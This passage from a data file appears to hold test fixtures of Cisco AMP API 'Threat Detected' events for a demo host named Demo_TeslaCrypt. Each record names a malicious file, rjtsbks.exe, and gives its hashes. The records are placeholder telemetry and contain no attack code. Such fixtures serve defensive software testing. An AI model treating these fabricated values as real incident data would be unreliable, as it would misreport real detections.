Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 